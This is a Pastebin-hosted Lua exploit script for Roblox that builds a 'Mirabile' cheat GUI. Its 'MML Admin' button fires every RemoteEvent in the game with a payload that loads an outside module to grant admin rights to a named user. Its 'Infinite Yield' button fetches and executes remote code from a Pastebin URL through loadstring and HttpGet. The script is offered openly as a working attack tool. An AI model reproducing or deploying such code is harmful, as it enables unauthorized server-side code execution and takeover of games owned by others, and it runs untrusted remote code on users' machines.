Advertisement
CreeperExploits

Untitled

Apr 28th, 2018
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.25 KB | None | 0 0
  1. -- Objects
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local frame = Instance.new("Frame")
  5. local Title = Instance.new("TextLabel")
  6. local Credits = Instance.new("TextLabel")
  7. local MMLAdmin = Instance.new("TextButton")
  8. local InfinYield = Instance.new("TextButton")
  9. local Custom = Instance.new("TextBox")
  10.  
  11. -- Properties
  12.  
  13. ScreenGui.Name = "Mirabile"
  14. ScreenGui.Parent = game.CoreGui
  15.  
  16. frame.Name = "frame"
  17. frame.Parent = ScreenGui
  18. frame.Active = true
  19. frame.BackgroundColor3 = Color3.new(1, 1, 1)
  20. frame.Draggable = true
  21. frame.Position = UDim2.new(0.391818196, 0, 0.32384342, 0)
  22. frame.Size = UDim2.new(0, 395, 0, 198)
  23. frame.Style = Enum.FrameStyle.ChatBlue
  24.  
  25. Title.Name = "Title"
  26. Title.Parent = frame
  27. Title.BackgroundColor3 = Color3.new(1, 1, 1)
  28. Title.BorderSizePixel = 0
  29. Title.Position = UDim2.new(0.0886076018, 0, -0.103216276, 0)
  30. Title.Size = UDim2.new(0, 302, 0, 50)
  31. Title.Font = Enum.Font.Bodoni
  32. Title.FontSize = Enum.FontSize.Size14
  33. Title.Text = "Mirabile"
  34. Title.TextScaled = true
  35. Title.TextSize = 14
  36. Title.TextWrapped = true
  37.  
  38. Credits.Name = "Credits"
  39. Credits.Parent = frame
  40. Credits.BackgroundColor3 = Color3.new(1, 1, 1)
  41. Credits.BorderSizePixel = 0
  42. Credits.Position = UDim2.new(0.0177215189, 0, 0.175436661, 0)
  43. Credits.Size = UDim2.new(0, 354, 0, 30)
  44. Credits.Font = Enum.Font.Fantasy
  45. Credits.FontSize = Enum.FontSize.Size14
  46. Credits.Text = "This GUI was made and developed by CreeperExploits. Credits to the owners of the scripts in this GUI. "
  47. Credits.TextScaled = true
  48. Credits.TextSize = 14
  49. Credits.TextWrapped = true
  50.  
  51. MMLAdmin.Name = "MMLAdmin"
  52. MMLAdmin.Parent = frame
  53. MMLAdmin.BackgroundColor3 = Color3.new(1, 1, 1)
  54. MMLAdmin.BorderColor3 = Color3.new(0, 0, 0)
  55. MMLAdmin.BorderSizePixel = 6
  56. MMLAdmin.Position = UDim2.new(0.0151898731, 0, 0.607865691, 0)
  57. MMLAdmin.Size = UDim2.new(0, 141, 0, 61)
  58. MMLAdmin.Font = Enum.Font.Cartoon
  59. MMLAdmin.FontSize = Enum.FontSize.Size14
  60. MMLAdmin.Text = "MML Admin (Only serverside)"
  61. MMLAdmin.TextColor3 = Color3.new(0, 0, 0)
  62. MMLAdmin.TextScaled = true
  63. MMLAdmin.TextSize = 14
  64. MMLAdmin.TextWrapped = true
  65.  
  66. InfinYield.Name = "InfinYield"
  67. InfinYield.Parent = frame
  68. InfinYield.BackgroundColor3 = Color3.new(1, 1, 1)
  69. InfinYield.BorderSizePixel = 6
  70. InfinYield.Position = UDim2.new(0.584810197, 0, 0.613645434, 0)
  71. InfinYield.Size = UDim2.new(0, 140, 0, 58)
  72. InfinYield.Font = Enum.Font.Cartoon
  73. InfinYield.FontSize = Enum.FontSize.Size14
  74. InfinYield.Text = "Infinite Yield (NON FE)"
  75. InfinYield.TextScaled = true
  76. InfinYield.TextSize = 14
  77. InfinYield.TextWrapped = true
  78.  
  79. Custom.Name = "Custom"
  80. Custom.Parent = frame
  81. Custom.BackgroundColor3 = Color3.new(1, 1, 1)
  82. Custom.BorderSizePixel = 0
  83. Custom.Position = UDim2.new(0.0632911325, 0, 0.393939406, 0)
  84. Custom.Size = UDim2.new(0, 330, 0, 23)
  85. Custom.Font = Enum.Font.Fantasy
  86. Custom.FontSize = Enum.FontSize.Size14
  87. Custom.Text = "Custom GUI for: promemr"
  88. Custom.TextScaled = true
  89. Custom.TextSize = 14
  90. Custom.TextWrapped = true
  91.  
  92. -- Functions
  93.  
  94. MMLAdmin.MouseButton1Down:connect(function()
  95. for _,v in pairs(game:GetDescendants()) do
  96. if v:IsA('RemoteEvent') then
  97. v:FireServer([[require(520532182).giveAdmin"promemr"]])
  98. end
  99. end
  100. end)
  101.  
  102. InfinYield.MouseButton1Down:connect(function()
  103. loadstring(game:HttpGet(('https://pastebin.com/raw/MjBzRjmT'),true))()
  104. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement